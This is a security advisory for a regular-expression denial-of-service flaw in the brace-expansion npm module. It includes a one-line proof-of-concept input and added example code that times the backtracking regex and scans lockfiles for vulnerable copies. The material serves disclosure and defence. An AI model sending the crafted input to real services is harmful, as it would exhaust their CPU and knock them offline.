ReDoS

Module: brace-expansion

Published: April 25th, 2017

Reported by: myvyang

CVE-NONE

CWE-400

Vulnerable: <=1.1.6
Patched: >=1.1.7

Overview

Affected versions of brace-expansion are vulnerable to regular expression denial of service (ReDoS): a crafted input string makes the module's pattern matching consume excessive CPU time.

Proof of Concept

var expand = require('brace-expansion');
// A single brace group whose body is a long run of commas ending in a newline
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
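Why the input above is expensive, shown as an added example (this is not code from the brace-expansion project or from the advisory). It assumes that the pre-1.1.7 "does this brace body contain options?" check was the regex `/^(.*,)+(.+)?$/`; that is my recollection of what PR #35 replaced, so treat it as an assumption and confirm against the PR. The `hasOptionsLinear` replacement, the `pocBody` input builder and the timing helper are mine.

```javascript
// Added example, not the project's code.
// ASSUMPTION: the pre-1.1.7 options check used this regex (verify against PR #35).
const OPTIONS_REGEX = /^(.*,)+(.+)?$/;

// Regex form. `.` does not match "\n", so for a body that ends in a newline
// `$` can never succeed; the engine then retries every way of splitting the
// commas among the (.*,)+ repeats, roughly 2^(n-1) attempts for n commas,
// before finally answering false.
function hasOptionsRegex(body) {
  return OPTIONS_REGEX.test(body);
}

// Linear-time replacement: a plain substring search, no backtracking.
function hasOptionsLinear(body) {
  return body.indexOf(',') >= 0;
}

// Constructed input in the shape of the advisory's PoC body: n commas, then "\n".
function pocBody(n) {
  return ','.repeat(n) + '\n';
}

// Wall-clock time of one call in milliseconds (coarse, but the growth is visible).
function timeMs(fn, input) {
  const start = Date.now();
  fn(input);
  return Date.now() - start;
}

// On newline-free bodies the two checks agree, so the linear version is a
// drop-in replacement. Bodies containing "\n" are exactly the case where they
// differ: the regex never matches them (after exponential work), the linear
// check simply reports whether a comma is present.
function implementationsAgree(samples) {
  return samples.every((s) => hasOptionsLinear(s) === hasOptionsRegex(s));
}

// Stand-alone demo: kept to small n so it finishes in milliseconds.
for (const n of [8, 12, 14, 16]) {
  console.log(`n=${n} commas: regex ${timeMs(hasOptionsRegex, pocBody(n))} ms, ` +
              `linear ${timeMs(hasOptionsLinear, pocBody(n))} ms`);
}
```

Raising `n` toward the roughly one hundred commas of the PoC makes the regex version effectively never return, which is the denial of service; the linear check stays constant.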

Remediation

Update to version 1.1.7 or later.
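brace-expansion is usually pulled in transitively (for example through minimatch), so an upgrade at the top level can leave an old nested copy behind. The following added example (my code, not the project's or the advisory's) walks a parsed package-lock.json and reports every copy in the advisory's vulnerable range, `<=1.1.6`. The sample lockfile object is constructed for the example; the function and variable names are mine.

```javascript
// Added example, not the project's code.
// Vulnerable range per the advisory: <=1.1.6; patched: >=1.1.7.

// Numeric comparison of "x.y.z" strings: returns -1, 0 or 1.
// A leading "v" and any prerelease suffix are ignored.
function compareVersions(a, b) {
  const parse = (v) => v.replace(/^v/, '').split('-')[0].split('.').map(Number);
  const pa = parse(a), pb = parse(b);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isVulnerableBraceExpansion(version) {
  return compareVersions(version, '1.1.7') < 0; // i.e. <= 1.1.6
}

// Collect every installed copy of brace-expansion with its node_modules path.
// Lockfile v1 nests "dependencies" recursively; v2/v3 list all installs flat
// under "packages" keyed by path (v2 also keeps "dependencies", so prefer
// "packages" when present to avoid counting a copy twice).
function findBraceExpansion(lock) {
  const found = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith('node_modules/brace-expansion') && meta.version) {
        found.push({ path, version: meta.version });
      }
    }
    return found;
  }
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = prefix + 'node_modules/' + name;
      if (name === 'brace-expansion' && meta.version) {
        found.push({ path, version: meta.version });
      }
      walk(meta.dependencies, path + '/');
    }
  };
  walk(lock.dependencies, '');
  return found;
}

function vulnerableCopies(lock) {
  return findBraceExpansion(lock).filter((e) => isVulnerableBraceExpansion(e.version));
}

// Constructed sample lockfile (v1 shape): one patched copy, one vulnerable copy
// hidden two levels down under an older minimatch.
const SAMPLE_LOCK = {
  lockfileVersion: 1,
  dependencies: {
    minimatch: {
      version: '3.0.4',
      dependencies: { 'brace-expansion': { version: '1.1.7' } },
    },
    'some-old-tool': {
      version: '0.1.0',
      dependencies: {
        minimatch: {
          version: '3.0.3',
          dependencies: { 'brace-expansion': { version: '1.1.6' } },
        },
      },
    },
  },
};

// Stand-alone run: print each vulnerable copy with its path.
for (const copy of vulnerableCopies(SAMPLE_LOCK)) {
  console.log(`vulnerable brace-expansion ${copy.version} at ${copy.path}`);
}
```

To run it against a real project, replace `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`; the same walk works for the `packages` map of lockfile v2 and v3.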

References

Issue #33, PR #35